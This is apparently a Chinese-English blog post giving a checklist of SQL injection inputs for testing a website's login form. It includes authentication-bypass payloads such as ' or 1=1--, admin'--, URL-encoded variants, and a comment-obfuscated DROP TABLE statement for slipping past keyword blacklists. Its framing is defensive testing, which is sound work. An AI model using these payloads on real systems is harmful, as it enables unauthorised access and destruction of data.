第一个输入字段我喜欢测试“搜索引擎”和“登录表单”的一个网站,最下面的例子是测试一个“登录表单”。你应该旨在抑制任何错误消息和服务器响应在生产环境中,把开发人员调试。我们将假定接收脚本有一个最严重的SQL语句:
1 SELECT *
2 FROM users
3 WHERE username=‘‘
4 AND password=‘‘
1.Random SQL(随机的SQL):一些随机的SQL类型的输入值,看看服务器返回一个消息
1 Username: SELECT Username FROM Users WHERE ID=1
2 Password: SELECT MD5(Password) FROM Users WHERE ID=1
-- evaluates to:
SELECT * FROM users WHERE username=‘SELECT Username FROM Users WHERE ID=1‘ AND password=‘SELECT MD5(Password) FROM Users WHERE ID=1‘
Result should be "invalid username/password". Suppress any other messages
2.wildcards(通配符):输入一个(*)作为输入值进而观察结
1 Username: *
2 Password: <Leave Blank>
-- evaluates to:
SELECT * FROM users WHERE username=‘*‘ AND password=‘‘
Result should be "invalid username/password"
3.comments-dashdash 输入一个一个已知的用户名(如:admin)作为输入,以及后缀注释命令(如:--)
1 Username: admin‘--
2 Password:
-- evaluates to:
SELECT * FROM users WHERE username=‘admin‘--‘ AND password=‘‘
Result should be "invalid username/password".
4.comments-hash 输入一个一个已知的用户名(如:admin)作为输入,以及后缀注释命令(如:#)
1 Username: admin‘#
2 Password:
-- evaluates to:
SELECT * FROM users WHERE username=‘admin‘#‘ AND password=‘‘
Result should be "invalid username/password"
5.Comments - bypassing pattern matches (绕过模式的匹配) 测试目标主机系统正在寻找诸如DROP关键字或避免的黑名单
1 Username: ‘;DR/**/OP tempTable;
2 Password:
-- evaluates to:
SELECT * FROM users WHERE username=‘‘;DROP tempTable;‘ AND password=‘‘
5.The Classic 输入以下命令“ ‘OR 1=1--”作为输入值,用知道存在的用户名替代“admin”
1 Username: admin
2 Password: ‘ or 1=1--
-- evaluates to:
SELECT * FROM users WHERE username=‘admin‘ AND password=‘‘ OR 1=1--‘
Quick variations of this: #这主要要看返回的什么错误,然后在具体应用
admin‘ --
admin‘ #
admin‘/*
‘ or 1=1--
‘ or 1=1#
‘ or 1=1/*
‘) or ‘1‘=‘1--
‘) or (‘1‘=‘1--
7.Variations of the Classic: Comments 根据具体的系统,尝试输入注释语法,用知道存在的用户名替代“admin”
1 Username: admin
2 Password: ‘ or 1=1 --IamJOE
-- evaluates to:
SELECT * FROM users WHERE username=‘admin‘ AND password=‘‘ OR 1=1 --IamJOE‘
8.Variations of the Classic: Empty 输入如:‘ or ‘ ‘=‘,用知道存在的用户名替换“admin”
1 Username: admin
2 Password: ‘ or ‘‘=‘
-- evaluates to:
SELECT * FROM users WHERE username=‘admin‘ AND password=‘ ‘ OR ‘‘=‘‘
9.Variations of the Classic: NewLines(换行符) 某些脚本无法解析一个换行符,它是另一个查询或脚本修整提交的最后一行,用存在知道的用户名替“admin”
1 Username: admin
2 Password: ‘
OR 1=1--
-- evaluates to:
SELECT * FROM users WHERE username=‘admin‘ AND password=‘‘
OR 1=1--‘
**New lines in SQL should be understood as \r\n.
10.Variations of the Classic: URL Encoded 尽管可以躲避掉转义‘,这里最有可能通过一个系统得到攻击。事实,所有在此页面上的攻击,可以将网址编码。键入以下内容:%27%20or%20%27%27%3D%27的输入值。
1 Username: admin
2 Password: %27%20or%20%27%27%3D%27
-- evaluates to:
SELECT * FROM users WHERE username=‘admin‘ AND password=‘‘ OR ‘‘=‘
11.Guest Password 如果知道一个有效的username/password,check that your scripts do not validate on password alone.(空密码)
1 Username: Guest
2 Password: <Password you know exists in system>
-- evaluates to:
SELECT * FROM users WHERE username=‘Guest‘ AND password=‘‘
sql百态01-post